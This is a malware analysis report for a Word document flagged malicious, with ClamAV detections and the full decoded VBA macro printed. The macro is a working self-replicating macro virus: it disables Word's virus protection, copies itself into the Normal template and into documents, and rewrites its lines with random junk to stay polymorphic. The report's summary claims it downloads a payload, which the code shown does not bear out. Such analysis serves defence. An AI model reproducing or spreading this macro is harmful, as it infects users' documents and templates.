MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that is triggered by the Document_Open event. This macro is designed to download and execute a secondary payload, as indicated by the critical ClamAV detections for 'Doc.Trojan.CPCK-2' and 'Doc.Trojan.Class-35'. The macro code is heavily obfuscated, but its intent to download and execute is clear from the heuristic firings.
Heuristics 3
-
ClamAV: Doc.Trojan.CPCK-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.CPCK-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15904 bytes |
SHA-256: cc395cfad2e753e377f209babed0ce5bdfd73207a9ebda1aa53bbc3e557530ff |
|||
|
Detection
ClamAV:
Doc.Trojan.Class-35
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
R = NgDBu + KvRBs + PwHNj + JrEIg + JyVKj + GvNVk + L
On Error Resume Next
J = NkKBh + PqHSx + ViOMq + JzFHj + UmUCl + QuMHq + VeNLw + IfDMs + N
Application.EnableCancelKey = 0
H = GgBIh + TvUUm + CxQHo + HyNHz + RpCSh + TqLFm + LnJFt + MiHMq + NyIDg + TfOBm + U
Options.VirusProtection = 0
J = PgIBl + JoDUs + UfTBu + KeQOr + H
ME84 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
T = OhKAu + IrVJh + DpRGy + TtUJj + JjHQz + FvHUm + E
Options.SaveNormalPrompt = 0
Q = PpEFg + IpMIr + VlTFg + B
Options.ConfirmConversions = 0
H = QnUAs + NkHHe + RgQOz + V
GJ13 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
I = EvPSf + AmFHh + RjUAk + BrVFs + UoHBg + HsEHo + BsHRf + HfIFt + RhUIy + J
If Left(ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
P = EwSIr + EvUUy + GzDJr + QsAJu + VfLIu + BoTVl + L
Set NQ17 = ActiveDocument.VBProject.VBComponents.Item(1)
T = JsUOj + PuAAh + EyIMm + FiKPn + BsFQq + SsEEt + A
UF19 = True
G = AxEMn + MwBGf + LgLMx + BrUFv + KoGTv + UtKAw + CfECm + CnOIw + UqBGf + T
End If
C = JeMPm + SfHUi + PgNAm + VwBJk + MxODz + QtANq + OmSCz + AlSOl + EwBRh + O
If Left(NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 3), 3) <> "Sub" Then
O = DxDSt + NxASx + OoIPp + QeICn + GvMRr + BgOMx + FwKJs + TnRQm + PlQCe + H
Set NQ17 = NormalTemplate.VBProject.VBComponents.Item(1)
O = ByKPs + NlMQj + NgKPr + DrEKu + CsMTh + LyFEe + FwIEn + TnPVe + LrTSq + KxMEo + DtQTm + M
ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.InsertLines ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, "' ****** " & Application.UserName & " was infected " & Now & vbCr
M = DrSIs + FuVUp + RxLTz + BvUDw + KsENh + LuBUf + EfLSm + KoDUm + CgRLs + FnVAm + KsLIl + C
ME84 = ME84 + 2
I = ImMMf + QjAIf + TiPEm + LtNLg + F
PH37 = True
Q = EwQFm + SnKUf + CpJCn + HqTJp + BgUVh + CfVQj + CnEVe + PgARp + VkFRo + ApRIf + MtTOf + E
End If
D = FhQVm + GeOOg + K
If PH37 <> True And UF19 <> True Then GoTo OU29
U = OjKOq + PgOPs + GzICr + IqARv + ChHAj + C
If PH37 = True Then NQ17.CodeModule.AddFromString ("Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, ME84 - 1))
E = TsMJo + PeAMh + BtLOk + KiPIr + NkFIi + RxJIp + VuPGp + N
If UF19 = True Then NQ17.CodeModule.AddFromString ("Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, GJ13 - 1))
N = BeCUj + LgRAn + LoSEi + D
With NQ17.CodeModule
S = VlMVi + AwIIe + LhKOp + ExRGp + ExVUm + LyTKu + FuNFz + K
For x = 2 To (NQ17.CodeModule.CountOfLines - 1) Step 2
D = HlTFz + IlLVt + OsVGx + AsGCn + HlEUr + EiLPv + VjIQs + BvCNw + JzQLz + FyVVv + AnANo + G
For y = 1 To (Int(Rnd * 10) + 2)
I = MrVEi + PeEQu + D
CI33 = CI33 + (Chr(65 + Int(Rnd * 22))) & (Chr(122 - Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(122 - Int(Rnd * 22))) & " + "
N = AoUJu + RsOGn + JrKFe + VuQKg + PzALt + AiCRi + OxKBj + PrKSr + KfMFw + JgBNn + BhIEj + U
Next y
T = DpNRj + QgSBm + TqTRg + F
.replaceline x, (Chr(65 + Int(Rnd * 22))) & " = " & CI33 & (Chr(65 + Int(Rnd * 22)))
M = LiKHk + LnKIj + NkVHg + ToNNt + QmNEm + TnIUw + EnKNg + HfIMj + U
CI33 = ""
J = EgEOs + KoIHq + FzKKw + CjALz + CfEHn + OfQRh + BvQAn + EfJSu + G
Next x
S = TpILl + HnSIu + RiUMt + UjLDp + GhREy + OvRHz + V
End With
N = FtFHj + ViVAe + PhTGv + FyHHx + UlUVo + QjSOr + OiRBm + HpOFr + KrFEz + AoUJr + AhOVo + M
OU29:
L = TgUIu + DvMTi + BeUHl + TmEMg + NrNDj + MoDQn + SjMOs + EnOJi + IhBIl + JoJDe + VtHGk + S
If GJ13 <> 0 And ME84 = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
C = AmJKr + AzFIt + IgMMr + PeFDr + EfDPh + PqHOp + MhPRu + E
' ****** MACRO was infected 8/21/2000 1:19:59 PM
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.